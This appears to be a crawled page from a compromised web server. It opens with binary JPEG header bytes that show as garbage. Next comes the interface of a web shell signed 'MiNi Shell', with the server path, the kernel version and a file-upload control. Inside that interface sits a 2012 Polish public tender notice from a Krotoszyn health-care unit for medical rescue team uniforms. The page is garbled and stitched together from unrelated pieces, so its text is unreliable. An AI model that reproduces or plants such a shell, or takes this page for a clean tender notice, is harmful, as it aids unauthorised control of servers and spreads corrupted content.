JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120803/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120803/285028-N-2012.html

<p class="kh_header"><b>Krotoszyn: Zakup umundurowania letniego i zimowego dla członków zespołów ratownictwa medycznego dla SP ZOZ Krotoszynie.</b><br>
<b>Numer ogłoszenia: 285028 - 2012; data zamieszczenia: 03.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Młyńska 2, 63-700 Krotoszyn, woj. wielkopolskie, tel. 062 5880390 w. 253, faks 062 5880402.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzoz.krotoszyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup umundurowania letniego i zimowego dla członków zespołów ratownictwa medycznego dla SP ZOZ Krotoszynie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakup umundurowania letniego i zimowego dla członków zespołów ratownictwa medycznego dla SP ZOZ Krotoszynie - poniżej 200 tys euro.
1.	Koszula - bluza letnia: 
1.1. barwa  fluorescencyjna  czerwona,  zgodna  z  Polską  Normą PN-EN 471 + A1:2008 lub normą ją zastępującą,
1.2. materiał o oporze pary wodnej nie większym niż 5 m2 x Pa/W,
1.3. materiał o gramaturze  180 - 240 g/m2,
1.4. materiał zawierający min. 30% a max. 50% bawełny,
1.5. długi rękaw, 
1.6.  kołnierz typu stójka,
1.7. kieszenie: 
1.7.1. z przodu na wysokości bioder co najmniej dwie poszerzane kieszenie, umieszczone symetrycznie po obu stronach z otworami przykrytymi klapkami, zapinane na metalowe zatrzaski
1.7.2. z przodu na wysokości klatki piersiowej co najmniej jedna kieszeń z otworem przykrytym patką zapinane na metalowy zatrzask, dodatkowo kieszeń na długopisy,
1.8. regulacja obwodu mankietów zapinana za pomocą taśmy samosczepnej- rzep,
1.9. zapinana na metalowe zatrzaski,
1.10. oznakowania:
1.10.1. na wysokości ramienia na lewym rękawie naszywka odblaskowa z wzorem graficznym systemu, 
1.10.2. naszywka na taśmie samosczepnej-rzep z odblaskową nazwą funkcji z przodu odzieży po lewej stronie,
1.10.3. na plecach naszywka odblaskowa z nazwą funkcji .
			szt.	90
2	2. Spodnie letnie do pasa :
2.1.   barwa  fluorescencyjna  czerwona,  zgodnie  z  Polską  Normą PN-EN 471 + A1:2008 lub normą ją zastępującą, klasa 2 w zakresie minimalnej powierzchni materiałów zapewniających widzialność członków zespołu ratownictwa medycznego
2.2.   dwa równoległe pasy z materiału odblaskowego o szerokości 5 cm, zgodnie  z  Polską  Normą PN-EN 471 + A1:2008 lub norma ją zastępującą, rozmieszczone poniżej uda wokół całego obwodu nogawek 
2.3.   materiał o gramaturze 180 - 240 g /m2,
2.4.   materiał zawierający min. 30% a max. 50% bawełny ,
2.5.    zapinane na zamek błyskawiczny i zatrzask metalowy,
2.6.   dół nogawek zakończony z sposób umożliwiający łatwą regulację długości,
2.7. u góry podtrzymywacze paska,
2.8.   kieszenie:
2.8.1. co najmniej dwie poniżej pasa z przodu, 
2.8.2. co najmniej jedna z tyłu zapinana na metalowy zatrzask, przykryta klapkami,
2.8.3. na nogawkach, po zewnętrznych stronach na wysokości ? uda poszerzane kieszenie zewnętrzne przykryte klapkami zapinane na metalowy zatrzask
2.8.4. kieszeń na telefon komórkowy,
2.9. na wysokości kolan wyprofilowane wzmocnienia,

			szt.	90
3	3. Spodnie zimowe do pasa :
3.1. barwa  fluorescencyjna  czerwona,  zgodnie  z  Polską  Normą PN-EN 471 + A1:2008 lub norma ją zastępująca, klasa  2  w zakresie  minimalnej  powierzchni  materiałów  zapewniających  widzialność członków zespołu ratownictwa medycznego,
3.2. zgodne z Polską Normą PN-EN 343 + A1:2008 lub norma ją zastępująca, co najmniej  klasa 2 w zakresie wodoszczelności i co najmniej klasy 2 w zakresie oporu pary wodnej,
3.3. dwa równoległe pasy z materiału odblaskowego o szerokości 5 cm, zgodne z Polską Normą PN-EN 471 + A1:2008 lub normy ją zastępującej, rozmieszczone poniżej uda wokół całego obwodu nogawek, 
3.4. materiał 100% poliester o gramaturze 150 -180 g/m2,
3.5. wzdłuż nogawek po zewnętrznej stronie wszyte zamki błyskawiczne,
3.6. od wewnątrz wykończone podszewką ( siatka,)
3.7. na wysokości kolan wyprofilowane wzmocnienia,
3.8. u góry podtrzymywacze paska,
3.9. zapinane na zamek błyskawiczny i metalowy zatrzask,
3.10. kieszenie:
3.11.1. co najmniej dwie poniżej pasa z przodu zapinane na zamek błyskawiczny,
3.12.2. z  tyłu co najmniej jedna kieszeń zapinana na zamek błyskawiczny przykryty patką,
3.13.3. na nogawkach, po zewnętrznych stronach na wysokości ? uda poszerzane kieszenie 
zewnętrzne przykryte klapkami zapinane na metalowe zatrzaski 
			szt.	55
4	
Kurtka całosezonowa :
4.1. barwa fluorescencyjna czerwona, zgodnie z Polską Normą PN-EN 471 + A1: 2008 lub 
norma ją zastępująca, klasa 2 w zakresie minimalnej   powierzchni   materiałów   
zapewniających   widzialność  członków zespołu  ratownictwa medycznego,
4.2. zgodna z Polską Normą PN-EN 343 + A1:2008 lub norma ją zastępująca, co najmniej 
klasa 2 w zakresie wodoszczelności i w zakresie oporu pary wodnej,
4.3. materiał 100% poliester o gramaturze 150 - 180 g/ m2,
4.4. pasy z materiału odblaskowego zgodnie z Polską Normą PN-EN 471 + A1: 2008, lub 
norma ją zastępująca, rozmieszczone:
4.4.1. na dole (nie mniej niż 5 cm od dolnej krawędzi) wokół całego obwodu kurtki pas 
odblaskowy umieszczony poziomo o szerokości nie mniejszej niż 5 cm,
4.4.2. nad ściągaczem w pasie (nie mniej niż 5 cm od dolnego pasa odblaskowego) wokół   
całego obwodu   kurtki   pas   odblaskowy   umieszczony   poziomo   o szerokości 5 cm,
4.4.3. na rękawach  na wysokości  ramion (poniżej naszywki  z wzorem graficznym 
systemu), pas odblaskowy umieszczony poziomo o szerokości 5 cm,
4.4.4. na  rękawach  na  wysokości  poniżej  łokcia  (nie  mniej  niż  5  cm  od  dolnej 
krawędzi rękawów) pas odblaskowy umieszczony poziomo o szerokości 5 cm
4.5. minimalna powierzchnia materiału odblaskowego 0,13m2
4.6. kaptur odpinany lub doszyty na stałe i chowany w stójce,
4.7. na  obwodzie  części  twarzowej  kaptura,  wokół  pasa  i  dolnej  krawędzi  kurtki 
wszyty tunel ze sznurkiem ściągającym,
4.8. z przodu co najmniej  dwie kieszenie  dolne umieszczone   symetrycznie z skośnymi
 otworami zapinane na zamki błyskawiczne przykryte patkami,
4.9. z przodu co najmniej dwie kieszenie na wysokości klatki piersiowej umieszczone 
symetrycznie po  obu  stronach z  zapięciem na zamek błyskawiczny  przykrytym  klapą
w tym jedna kieszeń o wymiarach umożliwiających zmieszczenie przenośnego 
radiotelefonu, 
4.10. rękawy odpinane, łączone rozłącznie na zamki błyskawiczne przykryte plisami,
4.11. regulacja obwodu mankietów za pomocą taśmy samosczepnej- rzep, 
4.12. na łokciach wyprofilowane wzmocnienia,
4.13. zamek błyskawiczny głównego zapięcia dwustronnie rozdzielczy,
4.14. plisa przykrywająca zapięcie główne zapinana na taśmę samosczepną- rzep,
4.15. co najmniej jedna kieszeń wewnętrzna zapinana na zamek błyskawiczny,
4.16. od  wewnątrz wykończona podszewką siatkową lub materiałem para
przepuszczalnym, 

			szt.	55
	4.17. długość co najmniej do wysokości bioder, 
4.18. z lewej strony u góry wszyta przeźroczysta folia plastikowa umożliwiająca umieszczenie identyfikatora,
np.: z imieniem i nazwiskiem,
4.19. element umożliwiające mocowania rękawiczek,
4.20. oznakowanie przodu:
4.20.1. na  lewej,  górnej  kieszeni  naszywka odblaskowa z nazwą funkcji mocowana na  taśmę  samosczepną- rzep 
4.20.2. na lewym rękawie  wzór graficzny  systemu  w postaci naszytej naszywki odblaskowej
4.21. oznakowanie tyłu:
4.21.1. wzór graficzny  systemu na wysokości klatki piersiowej w postaci  naszytej naszywki odblaskowej,
4.21.2. na plecach pod wzorem graficznym systemu nazwa funkcji w postaci naszytej naszywki odblaskowej.
				
5	Bluza - podpinka do kurtki: 
5.1. zgodna z Polską Normą PN-EN 14058:2007 lub norma ją zastępująca, co najmniej klasa 2  w zakresie oporu cieplnego,
5.2. barwa fluorescencyjna czerwona, zgodnie z Polską Normą  PN-EN 343 + A1:2008 lub norma ją zastępująca,
5.3. wykonana z dzianiny typu polar o gramaturze max. 390 g/m2,
5.4. mocowanie do kurtki w sposób rozdzielny na zamek błyskawiczny,
5.5. regulacja obwodu mankietów za pomocą ściągacza,
5.6. z przodu, na dole co najmniej dwie kieszenie ze skośnymi otworami zapinane na zamek błyskawiczny,
5.7. kieszeń wewnętrzna zapinana na zamek błyskawiczny,
5.8. oznakowanie:
5.8.1. z przodu po lewej  stronie  na wysokości klatki piersiowej naszyta naszywka odblaskowa z  wzorem  graficznym  systemu,
5.8.2. z przodu po lewej stronie pod naszywką ze wzorem graficznym systemu emblemat odblaskowy z nazwą funkcji mocowany na taśmę samosczepną- rzep.
			szt.	55
6	Czapka zimowa :
6.1. zgodna z Polską Normą PN-EN 14058:2007 lub normą ją         zastępującą, co najmniej klasa 2 w zakresie oporu cieplnego,
6.2. barwa czerwona zgodnie z Polską Normą PN-EN 471 + A1:2008 lub normą ją zastępującą,
6.3. naszywka ze wzorem graficznym systemu wykonana na materiale odblaskowym,
6.4. z przodu wyposażona w daszek, 
6.5. regulacja obwodu głowy za pomocą taśmy samosczepnej- rzep.
			szt.	85
7	Rękawiczki:
7.1. materiał: tkanina, dzianina
7.2. barwa czarna,
7.3. ocieplane wewnętrzną warstwą termoizolacyjną
7.4. regulacja obwodu nadgarstka,zakończony ściągaczem
7.5. wewnętrzna część dłoni dodatkowo wzmocniona.
			szt.	85
8	Koszulka z krótkim rękawem:
8.1. materiał o oporze pary wodnej nie większym niż 5 m2 x Pa/W
8.2.barwa czerwona, zgodnie z Polską Normą  PN-EN 471 + A1: 2008 lub norma ją zastępująca
8.3.oznakowanie: z przodu po lewej stronie w górnej części wzór graficzny systemu

			szt.	85
Wymogi:											
- wykurcz tkaniny do 5 % po 4 praniach,											
	Dla umundurowania letniego i zimowego członków zespołów ratownictwa medycznego:
- dopuszcza się łączenie elementów umundurowania również w kolorze granatowym i czarnym, przy czym powinno spełniać wymagania PN-EN 471+ A1:2008   p.5.3 lub normy ją zastępujacej,
- dopuszcza się umieszczenie dodatkowych elementów poprawiających komfort pracy i funkcjonalność umundurowania oraz bezpeczeństwo pracy. 		Brak wypełnienia kolumny Numer katalogowy lub numer wzoru i Producent wymaganymi informacjami spowoduje odrzucenie oferty na pdostawie art. 89 ust. 1 pkt 2 Pzp. W przypadku nie stosowania u danego Wykonawcy numeru katalogowego lub numeru wzoru należy zaznaczyć to w formularzu cenowym zapisem np.: nie stosuje.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zakup umundurowania letniego i zimowego dla członków zespołów ratownictwa medycznego, maksymalnie 20 % wartości zmówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 18.11.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji, kiedy wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert,  jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co 	najmniej 1 dostawę o charakterze i złożoności porównywalnej z przedmiotem 	zamówienia wykonane za kwotę min. 100.000.00 zł brutto.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1)Oryginały lub poświadczone za zgodność z oryginałem przez Wykonawcę kopie dokumentów wskazujących, iż oferowany przedmiot zamówienia spełnia wymagania określone w rozporządzeniu Ministra Zdrowia z dnia 18 października 2010 r. w sprawie oznaczenia systemu Państwowe Ratownictwo Medyczne oraz wymagań w zakresie umundurowania członków zespołów ratownictwa medycznego ( DZ.U.2010, nr 209, poz. 1382). 
2)	Oryginały lub poświadczone za zgodność z oryginałem przez Wykonawcę kopie dokumentów potwierdzających opór pary wodnej nie przekraczający 5 m2 x Pa/W dla odzieży letniej.
3)	Oryginały lub poświadczone za zgodność z oryginałem przez Wykonawcę kopie dokumentów  potwierdzające, że taśma odblaskowa wykonana jest zgodnie z normą EN - 471 + A1:2008 lub normą zastępczą.
4)	Oryginały lub poświadczone za zgodność z oryginałem przez Wykonawcę kopie karty parametrów technicznych na odzież letnią i zimową lub inny dokument potwierdzający gramaturę i skład surowcowy, wydany prze upoważniony do tego podmiot.
5)	Oryginały lub poświadczone za zgodność z oryginałem przez Wykonawcę kopie tabel rozmiarowych, instrukcji użytkowania i konserwacji odzieży.

Wszelkie dokumenty sporządzone w języku obcym należy złożyć wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta winna zawierać wszystkie dokumenty i oświadczenia wymienione w rozdziale III pkt 13 i  VI niniejszej SIWZ oraz : 
a.	Formularz ofertowy podpisany przez osobę upoważnioną do składania oświadczenia woli w imieniu wykonawcy z wykorzystaniem wzoru - załącznik nr 1.
b.	Formularz cenowy podpisany przez osobę upoważnioną do składania oświadczenia woli w imieniu wykonawcy z wykorzystaniem wzoru - załącznik nr 2. Do oferty należy dołączyć wypełnione Formularze cenowe również w formie elektronicznej (plik.xls) z niezablokowanymi formułami. Formularze cenowe w formie pliku.xls umieszczone są i dostępne do ściągnięcia na stronie internetowej Zamawiającego www.bip.spzoz.krotoszyn.pl .
 
W przypadku podpisania oferty oraz poświadczenia za zgodność z oryginałem kopii dokumentów przez osobę niewymienioną w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo (oryginał lub kopia poświadczona na zgodność z oryginałem przez notariusza).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Cechy użytkowe - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>§ 6 PROJEKT UMOWY Strony ustalają możliwość zmiany cen wynikających z okoliczności, których nie można było przewidzieć w chwili zawarcia niniejszej umowy. Za okoliczność taką uważa się :
	-	ustawową zmianę stawek podatku VAT.
3.	W przypadku ustawowej zmiany stawki podatku VAT na przedmiot niniejszego zamówienia, jej zmiana 	następuje z mocy prawa.  
§ 13 PROJEKT UMOWY Strony dopuszczają zmiany umowy w zakresie: 
-      numeru katalogowego produktu/  numeru wzoru (w tym przypadku zmiana może być dokonana na 	podstawie pisemnego powiadomienia Zamawiającego o zmianie numeru katalogowego/numeru wzoru, 	bez konieczności podpisywania aneksu do umowy, z zaznaczeniem, której pozycji w Formularzu 	cenowym zmiana numeru katalogowego dotyczy).
-       wprowadzenia do sprzedaży przez wykonawcę produktu zmodyfikowanego / udoskonalonego, 
-       przedłużenia terminu realizacji umowy do czasu wykorzystania przedmiotu umowy, do wartości nie     
        większej niż całkowita wartość umowy.

Powyższe zmiany nie mogą skutkować zmianą ceny jednostkowej i nie mogą być niekorzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzoz.krotoszyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej 
ul. Młyńska 2    63-700 Krotoszyn
Pokój nr 20 ul. Młyńska 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.08.2012 godzina 10:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej 
ul. Młyńska 2    63-700 Krotoszyn
Sekretariat nr 1 ul. Młyńska 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com